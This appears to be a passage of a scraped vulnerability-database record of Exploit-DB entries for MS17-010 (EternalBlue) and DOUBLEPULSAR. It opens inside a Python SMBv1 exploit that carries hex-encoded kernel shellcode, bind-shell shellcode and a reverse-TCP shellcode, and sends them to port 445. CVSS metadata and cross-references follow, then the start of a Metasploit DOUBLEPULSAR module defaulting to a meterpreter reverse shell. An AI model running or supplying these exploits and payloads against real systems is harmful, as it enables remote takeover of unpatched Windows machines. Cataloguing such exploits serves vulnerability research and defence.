3010000e9b50000008b5d3c8b43e88b303375288b7808337d288b40043345283b431089c3757b8b4d3039f18b452c7418e8f20000008d4604506a00ff550885c0746389452c89753001df39f7775329df01c75789f28b753c8b76f089d9f3a45e89d9c1e9028b5d28311e83c604e2f901d039c67c288b452c6089e650ffd089f461e8a10000008b4524d1e831c988c101e98b0931c8894524e868000000b010eb08b020eb04b030eb008b4d38b4006601411e8b45108944241c61ff603c8d45488b4d0c89884701000089a83e01000066b810008b4d386601411e8b45108944241c6168000000008b403c506800000000c331c088c8c1e90800c8c1e90800c8c1e90800c8c3518b452489c10fc9d1e031c889452859c360e80b0000008b45108b483c89483861c3608b5d2c85db740d31c089df8b4d30f3aa53ff550c31c089453089452c61c357525689cf8b55448b0ae83900000085c0750e83c2088b0ae82b00000085c07421894d446a0c588d71543b06740783c6043b06750d3b4604750889753c31c040eb0231c05e5a5fc331c039c17d0140c3525131d2668b510201ca3b11740583c104ebf75a8d411c83c00724f88945448b41f889453889d15ac35355575641544155415641574889e54881ec800000006683e4f0e883030000488945f84889c3b92e5b51d2e8ee0100004885c00f84d50100004889c6b9940169e3e8d80100004885c00f84bf010000488945f04889c7b9855483f0e8be0100004885c00f84a5010000488945e84c8d4dd04d31c04c89c1448945d04c89c2b10bffd6448b45d04585c00f847f0100008b55d04831c9ffd74885c00f846e0100004889c34831c94989c9448b45d04889c2b10bffd64885c00f85510100004889d8482df80000004805280100008b55d081ea280100000f8c330100008955d050e83f0200004889c258b9fa3cadc24839ca740ab91abd4b2b4839ca75ca488b70e84889d9ff55e84889f04831d24889c38b503c4801d04889c64831c94889ca668b4806668b50144801d64883c61848bf2e646174610000004883f9000f84cd000000488b064839f874094883c62848ffc9ebe58b460c8b4e084801c648bbfefefefefefefefe4883e9084883f9000f8c9b000000488b3e4839df750c4c8b86980000004d85c074064883c608ebd84883c608488975e04831c9baf00f0000ff55f04885c074694989c14831c0b9000400004c89cff3ab4c89cf4883c760488d35910200004831c966b93602f3a44d8909488b5df8498959084831df488b5df0498959104831df488b5de8498959184831df488b5de0498959204831df41897944488b45e04883c0704983c1604c890848')\r\n\r\n # ASM Multi-Arch Kernel Ring 0 Shellcode by ZeroSum0x0: https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm\r\n # Modification to this shellcode:\r\n # Code has been modified to call \"KeUnstackDetachProcess\" aproper KeUnstackDetachProcess routine detaches the current thread from the address space of a process and restores the previous attach state. \r\n # Every successful call to KeStackAttachProcess must be matched by a subsequent call to KeUnstackDetachProcess. \r\n kernel_shellcode = binascii.unhexlify(b'b9820000c00f3248bbf80fd0ffffffffff8953048903488d050a0000004889c248c1ea200f30c30f01f865488924251000000065488b2425a801000050535152565755415041514152415341544155415641576a2b65ff34251000000041536a33514c89d14883ec08554881ec58010000488dac248000000048899dc00000004889bdc80000004889b5d000000048a1f80fd0ffffffffff4889c248c1ea204831dbffcb4821d84831c9b9820000c00f30fbe839000000fa65488b2425a80100004883ec78415f415e415d415c415b415a415941585d5f5e5a595b5865488b2425100000000f01f83eff2425f80fd0ff56415741564155415453554889e56683e4f04883ec204c8d35e3ffffff654c8b3c25380000004d8b7f0449c1ef0c49c1e70c4981ef00100000498b376681fe4d5a75ef41bc2004000031db89d983c10481f9000001000f8d5e0100004c89f289cb41bb6655a24be8b401000085c075db498b0e41bba36f722de8a20100004889c6e8480100004181f9bf771fdd75bc498b1e4d8d6e104c89ea4889d941bbe52411dce8790100006a4068001000004d8d4e0849c701001000004d31c04c89f231c948890a48f7d141bb4bca0aee4883ec20e84a010000498b3e488d35e900000031c966030dd70100006681c1f900f3a44889de4881c6080300004889f1488b114c29e251524889d14883ec2041bb2640369de8090100004883c4205a594885c07418488b80c80200004885c0740c4883c24c8b020fbae0057205488b09ebbe4883ea4c4989d431d280c29031c941bb26ac5091e8c80000004889c14c8d898000000041c601c34c89e24989c44d31c041506a01498b065041504883ec2041bbacce554be89800000031d25252415841594c89e141bb1838099ee8820000004c89e941bb22b7b37de8740000004889d941bb0de24d85e8660000004889ec5d5b415c415d415e415f5ec3e9b50000004d31c931c0ac41c1c90d3c617c022c204101c138e075ecc331d265488b5260488b5218488b5220488b12488b7250480fb74a4a4531c931c0ac3c617c022c2041c1c90d4101c1e2ee4539d975da4c8b7a20c34c89f8415141505251564889c28b423c4801d08b80880000004801d0508b4818448b40204901d048ffc9418b34884801d6e878ffffff4539d975ec58448b40244901d066418b0c48448b401c4901d0418b04884801d05e595a41584159415b4153ffe0564157554889e54883ec2041bbda16af92e84dffffff31c95151515141594c8d051a0000005a4883ec2041bb46451b22e868ffffff4889ec5d415f5ec3') \r\n\r\n # Shellcode TCP Bind port: 1337 size 484 bytes\r\n bindtcp_shellcode = binascii.unhexlify(b'fc4881e4f0ffffffe8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b020f85720000008b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e54831c0505049c7c40200053941544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a025950504d31c94d31c048ffc04889c241baea0fdfe0ffd54889c76a1041584c89e24889f941bac2db3767ffd54831d24889f941bab7e938ffffd54d31c04831d24889f941ba74ec3be1ffd54889f94889c741ba756e4d61ffd54881c4b00200004883ec104889e24d31c96a0441584889f941ba02d9c85fffd54883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd54801c34829c64885f675e141ffe758')\r\n\r\n # Shellcode TCP Reverse to 192.168.125.133 1337 \r\n reversetcp_shellcode = binascii.unhexlify(b'fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02000539c0a87d8541544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd550504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd54881c44002000049b8636d640000000000415041504889e25757574d31c06a0d594150e2fc66c74424540101488d442418c600684889e6565041504150415049ffc0415049ffc84d89c14c89c141ba79cc3f86ffd54831d248ffca8b0e41ba08871d60ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd5')\r\n\r\n shellcode = reversetcp_shellcode\r\n new_shellcode = kernel_shellcode + int(len(shellcode)).to_bytes(2,'little') + shellcode\r\n to_replace = orig_shellcode[:len(new_shellcode)]\r\n new_datfile = []\r\n for i in datfile:\r\n if i[0] != 'send':\r\n new_datfile.append(i)\r\n continue\r\n j = list(i)\r\n j[2] = j[2].replace(to_replace,new_shellcode)\r\n new_datfile.append(tuple(j))\r\n open(\"smb.dat\",\"w\").write(\"\\n\\n\".join([repr(i) for i in new_datfile]))\r\n\r\ndef main(hostip):\r\n # Modify original .dat file and add/replace Kernel Shellcode by Zerosum0x0 + User Shellcode\r\n mod_replay()\r\n # Read dat file and send it over\r\n dattosend = open(\"smb.dat\").read().split(\"\\n\\n\")\r\n dattosend = [ast.literal_eval(i) for i in dattosend]\r\n connections = []\r\n userid = b'\\x00\\x08'\r\n treeid = b'\\x00\\x08'\r\n start = time.monotonic()\r\n for i in dattosend:\r\n delta = i[-1] - (start - time.monotonic())\r\n if delta > 0:\r\n time.sleep(delta)\r\n start = time.monotonic()\r\n if i[0] == \"connect\":\r\n sock = socket.socket()\r\n sock.connect((hostip,445))\r\n connections.append({\"socket\":sock,\"stream\" : i[1]})\r\n if i[0] == \"close\":\r\n [j['socket'].close() for j in connections if j[\"stream\"] == i[1]]\r\n if i[0] == \"send\":\r\n data = i[2].replace(b\"__USERID__PLACEHOLDER__\", userid)\r\n data = data.replace(b\"__TREEID__PLACEHOLDER__\", treeid)\r\n [j['socket'].send(data) for j in connections if j[\"stream\"] == i[1]]\r\n if i[0] == \"recv\":\r\n data = [j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]\r\n if len(i) > 3:\r\n if i[2] == \"treeid\":\r\n treeid = data[0][28:30]\r\n if i[2] == \"userid\":\r\n userid = data[0][32:34]\r\n os.remove(\"smb.dat\")\r\n print(\"[*] Thanks NSA!\")\r\n print(\"[*] Creditz: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco\")\r\n print(\"[*] KPN Red team: <juan.sacco@kpn.com>\")\r\n\r\nif __name__ == \"__main__\":\r\n print(\"[*] MS17-010 Exploit - SMBv1 SrvOs2FeaToNt OOB\")\r\n print(\"[*] Exploit running.. Please wait\")\r\n main(sys.argv[1])", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "b3707319e60a5d53f83b97b7e5aa9cf4"}, {"key": "href", "hash": "d8276e96bec8d461c00437030f01a299"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "251f7e82e99b45e17b6cf8e939e6b119"}, {"key": "published", "hash": "251f7e82e99b45e17b6cf8e939e6b119"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "60c4e0e78ee956e23a4933b5570e4af7"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "scheme": null}, {"id": "EDB-ID:47456", "hash": "f4e267a2eb83e3d5a333c8f73ae8e22fd14be2bad91eefc01255b78e6ef9f7dc", "type": "exploitdb", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)", "description": "", "published": "2019-10-02T00:00:00", "modified": "2019-10-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.exploit-db.com/exploits/47456", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"], "lastseen": "2019-10-02T15:29:45", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-10-02T15:29:45", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-10-02T15:29:45", "rev": 2, "value": 7.9, "vector": "NONE"}}, "hash": "c8cebb2b52918b5c630433f18c5a950e78ee27864d20c3321bb1f2713cf51417", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8437845d202b2ebef5be3251e688af41", "key": "href"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}, {"hash": "e53848d9c7e659c4bd32f7af7ff99515", "key": "reporter"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "published"}, {"hash": "e1c3e280f0f2e9b13489f95ca8e6aeea", "key": "title"}], "history": [], "href": "https://www.exploit-db.com/exploits/47456", "id": "EDB-ID:47456", "immutableFields": [], "lastseen": "2019-10-02T15:29:45", "modified": "2019-10-02T00:00:00", "objectVersion": "1.5", "published": "2019-10-02T00:00:00", "references": [], "reporter": "Exploit-DB", "title": "DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)", "type": "exploitdb", "viewCount": 955}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2019-10-02T15:29:45"}], "viewCount": 1042, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2019-10-02T15:29:45", "rev": 2}, "score": {"value": 7.9, "vector": "NONE", "modified": "2019-10-02T15:29:45", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/47456", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = 